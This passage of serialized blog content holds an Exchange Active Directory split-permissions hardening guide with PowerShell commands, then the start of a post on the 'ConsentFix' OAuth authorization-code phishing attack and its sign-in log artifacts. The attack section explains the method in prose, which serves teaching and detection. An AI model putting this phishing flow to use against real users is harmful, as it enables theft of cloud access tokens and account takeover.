OUs.",[810,4640,4642],{"id":4641},"enable-split-permissions-model","Enable Split Permissions Model",[806,4644,4645,4646,4649,4650,4654],{},"Follow Microsoft's instructions ",[1736,4647,4648],{},"\"Switch to Active Directory split permissions\""," in\n",[833,4651,4465],{"href":4652,"rel":4653},"https://learn.microsoft.com/en-us/exchange/configure-exchange-server-for-split-permissions",[1410],[4655,4656,4657],"em",{},"(NOT RBAC split permissions)",[806,4659,4660,4661,4664],{},"In essence, it will remove the dangerous permissions of the ",[1736,4662,4663],{},"\"Exchange Windows Permissions\""," group and also remove Exchange as a group member.",[2009,4666,4667],{},[1588,4668,4669,2025,4672,2025,4675,2025,4678],{},[1588,4670,4671],{"style":4542},"Setup.exe",[1588,4673,4674],{"style":4562},"/IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF",[1588,4676,4677],{"style":4562},"/PrepareAD",[1588,4679,4680],{"style":4562},"/ActiveDirectorySplitPermissions:true",[1541,4682,1905,4684,4686,4687],{"style":4683},"background:#f4f4f4; border-left:4px solid var(--color-gk-petrol); border-radius:0 6px 6px 0; padding:0.75rem 1rem; margin:1rem 0; font-size:0.88rem; color:#000520;",[1736,4685,4494],{}," To revert back, simply use ",[1524,4688,4689],{},"/ActiveDirectorySplitPermissions:false",[1671,4691,4693],{"id":4692},"grant-ad-permissions","Grant AD Permissions",[806,4695,4696],{},"Create a custom AD group and make Exchange servers members.",[2009,4698,4699,4705,4707,2025,4710,4713,4714,4717,4718,4721,4722,2025,4724,2025,4727,4730,4731,4733,4713,4736,4739,4740],{},[1588,4700,4701],{},[1588,4702,4704],{"style":4703},"color:var(--color-black-40)","# adjust OU Path first!",[2016,4706],{},[1588,4708,4709],{"style":4542},"New-ADGroup",[1588,4711,4712],{"style":4562},"-Name"," \"AD_Custom Exchange Split permissions replacement\" ",[1588,4715,4716],{"style":4562},"-GroupCategory"," Security ",[1588,4719,4720],{"style":4562},"-GroupScope"," DomainLocal ",[1588,4723,4580],{"style":4562},[1736,4725,4726],{},"\"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\"",[1588,4728,4729],{"style":4562},"-Description"," \"replaces the permissions lost by split permissions on relevant OUs\"",[2016,4732],{},[1588,4734,4735],{"style":4542},"Add-ADGroupMember",[1588,4737,4738],{"style":4562},"-Members"," \"Exchange Trusted Subsystem\"\n",[1588,4741,4742],{"style":4703},"# reboot Exchange servers for permissions via group to work",[806,4744,4745],{},"I’ve created a script to make delegating the AD permissions easy per use case.",[3587,4747,4748],{},[806,4749,4750,4751,4754],{},"Without these permissions the Exchange server would receive the error ",[1524,4752,4753],{},"“INSUFF_ACCESS_RIGHTS”"," from AD.",[806,4756,4757,4758,4763],{},"Download ",[833,4759,4762],{"href":4760,"rel":4761},"https://github.com/glueckkanja/code-snippets/blob/main/ExchangeADSplitPermission/Add-ExchangeADSplitPermissionOnOU.ps1",[1410],"Add-ExchangeADSplitPermissionOnOU.ps1"," from glueckkanja GitHub",[806,4765,4766],{},"It can grant the following PermissionTypes:",[806,4768,4770,4773,4775,4776,4778],{"style":4769},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8;",[1736,4771,4772],{},"CreateUserAndContact",[2016,4774],{},"Create/delete, ResetPassword and WriteAllProperties for Users and Contacts",[2016,4777],{},[4779,4780,4781],"small",{},"Exchange cmdlets: `New-Mailbox`, `New-RemoteMailbox`, `New-MailUser`, `New-MailContact` and matching `Remove-*`",[806,4783,4785,4788,4790,4791,4793],{"style":4784},"background:#f5f5f5;padding:0.5rem 1rem;margin:0.25rem 0;border-left:3px solid #d8d8d8",[1736,4786,4787],{},"GroupManage",[2016,4789],{},"Create/Delete Groups, Modify Member",[2016,4792],{},[4779,4794,4795,4796,4798],{},"Exchange cmdlets: `New-DistributionGroup`, `Remove-DistributionGroup`, `Add-DistributionGroupMember`, `Update-DistributionGroupMember`, `Remove-DistributionGroupMember`",[2016,4797],{},"Also: user managing DistributionGroups they own via EAC",[806,4800,4801,4804,4806,4807,4809],{"style":4784},[1736,4802,4803],{},"UserSendAs",[2016,4805],{},"Modify AD Permissions on Users",[2016,4808],{},[4779,4810,4811],{},"Exchange cmdlet: `Add-ADPermission`",[806,4813,4814,4817,4819,4820,4822],{"style":4784},[1736,4815,4816],{},"GroupSendAs",[2016,4818],{},"Modify AD Permissions on Groups",[2016,4821],{},[4779,4823,4811],{},[806,4825,4826],{},[1736,4827,4828],{},"How to use the script:",[2009,4830,4831,2025,4833,4836,4837,4840,4841,4844,4845,4848,4850,2025,4852,4854,4855,4857,4858,4844,4860,2025,4862,4854,4864,4866,4867,4844,4869,2025,4871,4873,4874,4876,4877,4844,4879,2025,4881,4873,4883,4885,4886,4844],{},[1588,4832,4762],{"style":4542},[1588,4834,4835],{"style":4562},"-TargetOU"," \u003COU> ",[1588,4838,4839],{"style":4562},"-PermissionType"," \u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact> ",[1588,4842,4843],{"style":4562},"-Trustee"," \"AD_Custom Exchange Split permissions replacement\"\n",[1588,4846,4847],{"style":4703},"# For example",[2016,4849],{},[1588,4851,4762],{"style":4542},[1588,4853,4835],{"style":4562}," \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[1588,4856,4839],{"style":4562}," GroupManage ",[1588,4859,4843],{"style":4562},[1588,4861,4762],{"style":4542},[1588,4863,4835],{"style":4562},[1588,4865,4839],{"style":4562}," GroupSendAs ",[1588,4868,4843],{"style":4562},[1588,4870,4762],{"style":4542},[1588,4872,4835],{"style":4562}," \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" ",[1588,4875,4839],{"style":4562}," UserSendAs ",[1588,4878,4843],{"style":4562},[1588,4880,4762],{"style":4542},[1588,4882,4835],{"style":4562},[1588,4884,4839],{"style":4562}," CreateUserAndContact ",[1588,4887,4843],{"style":4562},[1671,4889,4891],{"id":4890},"grant-exchange-rbac","Grant Exchange RBAC",[806,4893,4894],{},[1736,4895,4896],{},"Re-enable -BypassSecurityGroupManagerCheck parameter for Add-DistributionGroupMember and Remove-DistributionGroupMember cmdlets:",[2009,4898,4899],{},[1588,4900,4901,2025,4904,4906,4907,4910,4911,4913,4914,4916],{},[1588,4902,4903],{"style":4542},"New-RoleGroup",[1588,4905,4712],{"style":4562}," \"SplitPermission Security Group Creation and Membership\" ",[1588,4908,4909],{"style":4562},"-Roles"," \"Security Group Creation and Membership\" ",[1588,4912,4738],{"style":4562}," \"Organization Management\",\"Recipient Management\" ",[1588,4915,4729],{"style":4562}," \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\"",[3587,4918,4919],{},[806,4920,4921,4923],{},[1736,4922,4494],{}," Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[806,4925,4926,4928,4931,4933],{},[2016,4927],{},[1736,4929,4930],{},"Re-enable New-Mailbox, New-RemoteMailbox, New-MailContact, Remove-... cmdlets with needed parameters:",[2016,4932],{},[2009,4934,4935,2025,4937,4939,4940,4942,4943,4913,4945,4947],{},[1588,4936,4903],{"style":4542},[1588,4938,4712],{"style":4562}," \"SplitPermission Mail Recipient Creation\" ",[1588,4941,4909],{"style":4562}," \"Mail Recipient Creation\" ",[1588,4944,4738],{"style":4562},[1588,4946,4729],{"style":4562}," \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[810,4949,4951],{"id":4950},"conclusions","Conclusions",[806,4953,4954],{},"I hope this guide helps more organizations take the important step of securing their Active Directory against compromise via Exchange. In my experience implementing the Exchange AD Split Permissions model across multiple customers, I have not encountered any issues and the adoption has been smooth.",[806,4956,4957],{},"I also hope Microsoft will introduce a native, OU-based approach to achieve this level of granularity, rather than the current all-or-nothing model, which would make widespread adoption significantly easier.",[806,4959,4960,4961,4966,4967,4972],{},"A note on AD Tiering: Please do not log on to Exchange servers with Domain Admin or any other Tier 0 accounts. Treat Exchange servers as Tier 1 and implement AD Tiering as soon as possible. As a first step, I recommend using ",[833,4962,4965],{"href":4963,"rel":4964},"https://www.pingcastle.com/",[1410],"PingCastle"," or ",[833,4968,4971],{"href":4969,"rel":4970},"https://www.semperis.com/purple-knight/",[1410],"Purple Knight"," to assess your AD security posture and identify control path exposures.",[3604,4974,4975],{},"\ncode {\n font-size: inherit\n}\n",{"title":863,"searchDepth":864,"depth":864,"links":4977},[4978,4979,4980,4981,4984,4988],{"id":4334,"depth":864,"text":4335},{"id":4379,"depth":864,"text":4380},{"id":4478,"depth":864,"text":4479},{"id":4519,"depth":864,"text":4520,"children":4982},[4983],{"id":4529,"depth":1814,"text":4530},{"id":4641,"depth":864,"text":4642,"children":4985},[4986,4987],{"id":4692,"depth":1814,"text":4693},{"id":4890,"depth":1814,"text":4891},{"id":4950,"depth":864,"text":4951},{"lang":4,"seoTitle":4990,"titleClass":873,"date":4991,"blogtitlepic":4992,"socialimg":4993,"customExcerpt":4994,"keywords":4995,"hreflang":4996,"scripts":5003,"asideNav":5004,"maxContent":508,"published":508},"Exchange AD Split Permissions: Secure Active Directory with Least Privilege","2026-03-01","head-exchange-ad-split-permissions","/blog/heads/head-exchange-ad-split-permissions.jpg","Even organizations that have fully migrated their mailboxes to the cloud often still run on-premises Exchange servers and with them, an underestimated security risk for Active Directory. The \"AD Split Permissions\" model strips Exchange of the broad AD privileges attackers could exploit for a full domain compromise. Until now, adoption has largely failed due to the process changes it imposes on administrators. This article shows how to elegantly overcome exactly that hurdle: a script that selectively re-grants the lost AD permissions on the relevant OUs only, preserving the familiar admin workflow while still achieving the full security benefit.","Exchange Server, Active Directory, AD split permissions, RBAC, Exchange permissions, AdminSDHolder, least privilege, AD ACL, PowerShell",[4997,4999,5001],{"lang":4,"href":4998},"/de/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":956,"href":5000},"/es/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"lang":953,"href":5002},"/en/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"slick":508,"form":508},{"menuItems":5005},[5006,5008,5010,5012,5014],{"href":5007,"text":4335},"#tldr-what-if-we-remove-the-downsides",{"href":5009,"text":4380},"#why-do-we-care-now",{"href":5011,"text":4479},"#but-why-is-no-one-doing-it",{"href":5013,"text":4520},"#show-me-this-no-regrets-option",{"href":5015,"text":4951},"#conclusions","/posts/2026-03-01-exchange-ad-split-permissions-hardening",{"title":4328,"description":863},"posts/2026-03-01-exchange-ad-split-permissions-hardening","2LLcvg4ClzcZySeeO5MMZkQ0Dmst7mCMcGysY3DmXFA",{"id":5021,"title":5022,"author":5023,"body":5025,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":508,"layout":870,"meta":5484,"moment":5485,"navigation":508,"path":5502,"seo":5503,"stem":5504,"tags":764,"webcast":749,"__hash__":5505},"content_de/posts/2026-01-27-exchange-active-directory.md","​​​Exchange AD Split Permissions without regrets​",[5024],"​Thorsten Kunzi​",{"type":803,"value":5026,"toc":5467},[5027,5029,5032,5036,5039,5056,5058,5060,5065,5075,5079,5082,5085,5115,5128,5130,5135,5143,5146,5159,5161,5166,5168,5178,5183,5188,5206,5209,5233,5235,5255,5263,5275,5285,5339,5342,5365,5382,5394,5407,5414,5416,5425,5436,5447,5449,5452,5455,5465],[1671,5028,4335],{"id":4334},[806,5030,5031],{},"I found a way to re-grant the AD and RBAC permissions where the Exchange user, groups, contacts, etc. reside. This way there is no adoption needed for admins or identity management systems, which in my experience was the blocker for most companies to implement it. And we still get the security benefit against lateral movement and domain compromise.",[806,5033,5034],{},[1449,5035],{"alt":4343,"src":4344},[1671,5037,4349],{"id":5038},"its-achieved-in-three-steps",[4351,5040,5041,5048,5052],{},[2741,5042,4355,5043,5046],{},[833,5044,4359],{"href":4358,"rel":5045},[1410],[2016,5047],{},[2741,5049,4362,5050],{},[2016,5051],{},[2741,5053,4365,5054],{},[2016,5055],{},[806,5057,4368],{},[1671,5059,4380],{"id":4379},[806,5061,5062,5063,4388],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. But the default shared permissions model represents a big security risk to Active Directory takeover. Combined with Exchange being notorious for remote exploits these last few years, it’s time to act!",[2016,5064],{},[2738,5066,5067,5069,5071,5073],{},[2741,5068,4393],{},[2741,5070,4396],{},[2741,5072,4399],{},[2741,5074,4402],{},[806,5076,5077],{},[1449,5078],{"alt":4407,"src":4408},[806,5080,5081],{},"Only certain high privileged Tier0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[1671,5083,4416],{"id":5084},"prominent-examples",[2738,5086,5087,5090,5106],{},[2741,5088,5089],{},"Entra Connect Sync account when using PWHashSync",[2741,5091,5092,5093],{},"Default groups\n",[2738,5094,5095,5098,5104],{},[2741,5096,5097],{},"Allowed RODC Password Replication Group together with EntraConnect account (If a real Windows RODC exists)",[2741,5099,4433,5100,4438],{},[833,5101,4437],{"href":5102,"rel":5103},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta/",[1410],[2741,5105,4441],{},[2741,5107,5108,5109],{},"Unprotected custom groups or admin/service accounts\n",[2738,5110,5111,5113],{},[2741,5112,4449],{},[2741,5114,4452],{},[806,5116,5117,5118,4460,5120,5123,4470,5125],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[2016,5119],{},[833,5121,4465],{"href":4463,"rel":5122},[1410],[2016,5124],{},[833,5126,4475],{"href":4473,"rel":5127},[1410],[810,5129,4479],{"id":4478},[806,5131,5132,5133,4487],{},"As split permissions weren’t available until Exchange 2010 SP1 everyone had accepted it by then and it seems that security teams did not manage to push successfully once it existed.",[2016,5134],{},[806,5136,5137,5138,5140],{},"No longer available or working cmdlets:",[2016,5139],{},[1524,5141,5142],{},"Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission ",[1671,5144,4500],{"id":5145},"adoption-examples",[2738,5147,5148,5157],{},[2741,5149,5150,5151],{},"New-Mailbox (where Exchange writes to AD) would be:\n",[2738,5152,5153,5155],{},[2741,5154,4510],{},[2741,5156,4513],{},[2741,5158,4516],{},[810,5160,4520],{"id":4519},[806,5162,5163,5165],{},[1736,5164,4525],{},": Please fully read and understand the following links and articles, perform in a test environment first, make sure AD backups are current and recovery practices are established!",[1671,5167,4530],{"id":4529},[806,5169,5170,5173,5175],{},[1736,5171,5172],{},"You should first check which of the affected cmdlets are in use on which OUs.",[2016,5174],{},[1524,5176,5177],{},"$CsvPath =\"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[806,5179,5180],{},[1524,5181,5182],{},"$Cmdlets = \"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[806,5184,5185],{},[1524,5186,5187],{},"Search-AdminAuditLog -ResultSize 99000 -Cmdlets $Cmdlets| select RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($_.CmdletParameters))}},succeeded,error | Export-Csv -Path $CsvPath -Delimiter \";\" -Encoding Unicode -NoTypeInformation",[806,5189,5190,5192,5194,5197,5200,5203],{},[1736,5191,4598],{},[2016,5193],{},[1524,5195,5196],{},"$CSVs=Import-Csv -Path $CsvPath -Delimiter \";\"",[1524,5198,5199],{},"$CSVs|group Caller",[1524,5201,5202],{},"$CSVs|group CmdletName",[1524,5204,5205],{},"Analyze the CSV for where AD permissions will be needed. Potentially optimize by moving all Exchange relevant groups into dedicated OUs.",[1671,5207,5208],{"id":4641},"Enable split permissions model",[806,5210,5211,5218,5220,5221,5223,5226,5228,2025,5231],{},[1736,5212,5213,5214,5217],{},"Follow instructions of “Switch to Active Directory split permissions” in ",[833,5215,4465],{"href":4358,"rel":5216},[1410]," (NOT RBAC split permissions)",[2016,5219],{},"\nIn essence it will remove the dangerous permissions of “Exchange Windows Permissions” group and also remove Exchange as group member.",[2016,5222],{},[1524,5224,5225],{},"Setup.exe /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /PrepareAD /ActiveDirectorySplitPermissions:true",[2016,5227],{},[1736,5229,5230],{},"To revert back just use:",[1524,5232,4689],{},[1671,5234,4693],{"id":4692},[806,5236,5237,5240,5242,5243,5245,5248,5250,5252],{},[1736,5238,5239],{},"Create a custom AD group and make Exchange server members.",[2016,5241],{},"\nadjust OU Path first!",[2016,5244],{},[1524,5246,5247],{},"New-ADGroup -Name \"AD_Custom Exchange Split permissions replacement\" -GroupCategory Security -GroupScope DomainLocal -Path \"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\" -Description \"replaces the permissions lost by split permissions on relevant OUs\"",[2016,5249],{},[2016,5251],{},[1524,5253,5254],{},"Add-ADGroupMember \"AD_Custom Exchange Split permissions replacement\" -Members \"Exchange Trusted Subsystem\"",[806,5256,5257,5260,5262],{},[1736,5258,5259],{},"reboot Exchange servers for permissions via group to work",[2016,5261],{},"\nI’ve created a script to make delegating the AD permissions easy per use case.",[3587,5264,5265],{},[806,5266,5267,5272,5273,4754],{},[1736,5268,5269],{},[4655,5270,5271],{},"INFO:"," Without these permissions the Exchange server would receive the error ",[1524,5274,4753],{},[806,5276,5277,5282,5284],{},[1736,5278,4757,5279,4763],{},[833,5280,4762],{"href":4760,"rel":5281},[1410],[2016,5283],{},"\nIt can grant the following PermissionTypes:",[2738,5286,5287,5298,5316,5328],{},[2741,5288,5289,5291],{},[1736,5290,4772],{},[2738,5292,5293,5295],{},[2741,5294,4775],{},[2741,5296,5297],{},"Exchange cmdlets: New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and the matching Remove-*",[2741,5299,5300,5302],{},[1736,5301,4787],{},[2738,5303,5304,5306,5309],{},[2741,5305,4790],{},[2741,5307,5308],{},"Exchange cmdlets: New-DistributionGroup, Remove-DistributionGroup, Add-DistributionGroupMember, Update-DistributionGroupMember, Remove-DistributionGroupMember",[2741,5310,5311,5312],{},"Additional usecases: user managing DistributionGroups they own via https://",[5313,5314,5315],"on-prem-exchange",{},"/EAC",[2741,5317,5318,5320],{},[1736,5319,4803],{},[2738,5321,5322,5325],{},[2741,5323,5324],{},"Modfiy AD Permissions on Users",[2741,5326,5327],{},"Exchange cmdlet: Add-ADPermission",[2741,5329,5330,5332],{},[1736,5331,4816],{},[2738,5333,5334,5337],{},[2741,5335,5336],{},"Modfiy AD Permissions on Groups",[2741,5338,5327],{},[1671,5340,4828],{"id":5341},"how-to-use-the-script",[806,5343,5344],{},[1524,5345,5346,2025,5349,2025,5355,2025,5357,2025,5362],{},[1524,5347,5348],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU",[5350,5351,5352],"b",{},[1524,5353,5354],{},"\u003COU>",[1524,5356,4839],{},[5350,5358,5359],{},[1524,5360,5361],{},"\u003CGroupManage|UserSendAs|GroupSendAs|CreateUserAndContact>",[1524,5363,5364],{},"-Trustee \"AD_Custom Exchange Split permissions replacement",[806,5366,5367,5368,5370],{},"e.g.",[2016,5369],{},[1524,5371,5372,2025,5375,2025,5379],{},[1524,5373,5374],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=ExchangeGroups,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[5350,5376,5377],{},[1524,5378,4787],{},[1524,5380,5381],{},"-Trustee \"AD_Custom Exchange Split permissions replacement\"",[806,5383,5384],{},[1524,5385,5386,2025,5388,2025,5392],{},[1524,5387,5374],{},[5350,5389,5390],{},[1524,5391,4816],{},[1524,5393,5381],{},[806,5395,5396],{},[1524,5397,5398,2025,5401,2025,5405],{},[1524,5399,5400],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType",[5350,5402,5403],{},[1524,5404,4803],{},[1524,5406,5381],{},[806,5408,5409],{},[1524,5410,5411],{},[1524,5412,5413],{},"Add-ExchangeADSplitPermissionOnOU.ps1 -TargetOU \"OU=Users,OU=HQ,OU=Alderaan,$((Get-ADDomain).DistinguishedName)\" -PermissionType CreateUserAndContact -Trustee \"AD_Custom Exchange Split permissions replacement\"",[1671,5415,4891],{"id":4890},[806,5417,5418,5420,5422],{},[1736,5419,4896],{},[2016,5421],{},[1524,5423,5424],{},"New-RoleGroup -Name \"SplitPermission Security Group Creation and Membership\" -Roles \"Security Group Creation and Membership\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back -BypassSecurityGroupManagerCheck to Add-DistributionGroupMember, but also needs AD ACL for Exchange Server on target DLs\" ",[3587,5426,5427],{},[806,5428,5429,2025,5433,5435],{},[1736,5430,5431],{},[4655,5432,5271],{},[2016,5434],{},"Else you get \"-BypassSecurityGroupManagerCheck parameter is not available\" or \"You don't have sufficient permissions. This operation can only be performed by a manager of the group\"",[806,5437,5438,5440,5442,5444],{},[2016,5439],{},[1736,5441,4930],{},[2016,5443],{},[1524,5445,5446],{},"New-RoleGroup -Name \"SplitPermission Mail Recipient Creation\" -Roles \"Mail Recipient Creation\" -Members \"Organization Management\",\"Recipient Management\" -Description \"Brings back New-Mailbox, New-RemoteMailbox, New-MailUser, New-MailContact and matching Remove-... cmdlets, but additionally Exchange needs AD ACL for Exchange Server on target OUs\"",[810,5448,4951],{"id":4950},[806,5450,5451],{},"I hope that with this guidance many more will take this important step to secure their Active Directory from compromise via Exchange. I have not yet run into issues when I implemented Exchange AD split permissions model and the adoption from this article at our customers.",[806,5453,5454],{},"I hope Microsoft will implement a native way to achieve this granular OU based approach, instead of the current all or nothing, for it to become widely adopted.",[806,5456,5457,5458,4966,5461,5464],{},"As AD Tiering is dear to my heart: Additionally, please do not logon to Exchange servers with Domain Admin (or any Tier0) accounts but treat them as Tier1 from now on and implement AD Tiering asap.\nAs a first step, I recommend tools like ",[833,5459,4965],{"href":4963,"rel":5460},[1410],[833,5462,4971],{"href":4969,"rel":5463},[1410]," to assess your AD Security and Control Paths.",[3604,5466,4975],{},{"title":863,"searchDepth":864,"depth":864,"links":5468},[5469,5470,5471,5472,5473,5476,5483],{"id":4334,"depth":1814,"text":4335},{"id":5038,"depth":1814,"text":4349},{"id":4379,"depth":1814,"text":4380},{"id":5084,"depth":1814,"text":4416},{"id":4478,"depth":864,"text":4479,"children":5474},[5475],{"id":5145,"depth":1814,"text":4500},{"id":4519,"depth":864,"text":4520,"children":5477},[5478,5479,5480,5481,5482],{"id":4529,"depth":1814,"text":4530},{"id":4641,"depth":1814,"text":5208},{"id":4692,"depth":1814,"text":4693},{"id":5341,"depth":1814,"text":4828},{"id":4890,"depth":1814,"text":4891},{"id":4950,"depth":864,"text":4951},{"lang":953,"seoTitle":4990,"titleClass":873,"date":5485,"blogtitlepic":5486,"socialimg":5487,"customExcerpt":5488,"keywords":4995,"hreflang":5489,"scripts":5494,"asideNav":5495,"maxContent":508,"published":749},"2026-01-27","head-vulnerability-management","/heads/head-vulnerability-management.jpg","On-Premises Exchange Server installations are still prevalent even for organizations that have moved all mailboxes to the cloud. Also, they are still very powerful within Active Directory so most times there is a strong attack path on compromising the whole AD and with that usually much of the corporate IT. Switching to the so called “AD Split permissions” removes the critical permissions and I have engineered a solution that removes it’s downsides that usually prevented the adoption.",[5490,5492],{"lang":953,"href":5491},"/en/posts/2026-01-27-exchange-active-directory",{"lang":956,"href":5493},"/es/posts/2026-01-27-exchange-active-directory",{"slick":508,"form":508},{"menuItems":5496},[5497,5498,5499,5500,5501],{"href":5007,"text":4335},{"href":5009,"text":4380},{"href":5011,"text":4479},{"href":5013,"text":4520},{"href":5015,"text":4951},"/posts/2026-01-27-exchange-active-directory",{"title":5022,"description":863},"posts/2026-01-27-exchange-active-directory","GIJKs0KoXNlN8lgokuTJTmXqlw1U_NE9Ak6MMaScqf4",{"id":5507,"title":5508,"author":5509,"body":5510,"cta":764,"description":5514,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":6293,"moment":6295,"navigation":508,"path":6321,"seo":6322,"stem":6323,"tags":6324,"webcast":749,"__hash__":6327},"content_de/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[1185,1065,1221],{"type":803,"value":5511,"toc":6273},[5512,5515,5518,5521,5527,5530,5533,5542,5547,5555,5575,5578,5584,5587,5590,5596,5601,5605,5616,5622,5625,5628,5632,5635,5641,5648,5651,5671,5681,5685,5688,5691,5694,5697,5701,5704,5707,5724,5733,5737,5741,5761,5765,5770,5781,5784,5790,5794,5808,5812,5823,5827,5830,5838,5841,5849,5852,5860,5864,5867,5888,5891,5955,5958,5961,5964,5967,5970,5976,5979,6020,6024,6039,6043,6047,6061,6064,6067,6072,6075,6086,6090,6097,6101,6107,6112,6126,6132,6138,6144,6155,6158,6164,6167,6192,6200,6204,6224,6230,6233,6239,6243],[806,5513,5514],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[806,5516,5517],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[806,5519,5520],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[806,5522,5523],{},[1449,5524],{"alt":5525,"src":5526},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[806,5528,5529],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[806,5531,5532],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[806,5534,5535,5536,5541],{},"You can easily reproduce this yourself, for example by using ",[833,5537,5540],{"href":5538,"rel":5539},"https://github.com/f-bader/TokenTacticsV2",[1410],"TokenTacticsV2",", or by crafting the URI manually.",[806,5543,5544],{},[1449,5545],{"alt":5540,"src":5546},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[806,5548,5549,5550,5554],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[833,5551,5552],{"href":5552,"rel":5553},"http://localhost:3001",[1410],". In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[2738,5556,5557,5567],{},[2741,5558,5559,5561,5563,5564,5566],{},[1736,5560,1524],{},[2016,5562],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[2016,5565],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[2741,5568,5569,5572,5574],{},[1736,5570,5571],{},"state",[2016,5573],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[806,5576,5577],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[806,5579,5580],{},[1449,5581],{"alt":5582,"src":5583},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[806,5585,5586],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[806,5588,5589],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[806,5591,5592],{},[1449,5593],{"alt":5594,"src":5595},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[3587,5597,5598],{},[806,5599,5600],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[810,5602,5604],{"id":5603},"detection-artifacts","Detection artifacts",[806,5606,5607,5608,5611,5612,5615],{},"When you reproduce the attack and check the ",[1524,5609,5610],{},"SigninLogs"," and ",[1524,5613,5614],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[806,5617,5618],{},[1449,5619],{"alt":5620,"src":5621},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[806,5623,5624],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[806,5626,5627],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[1671,5629,5631],{"id":5630},"missing-link","Missing 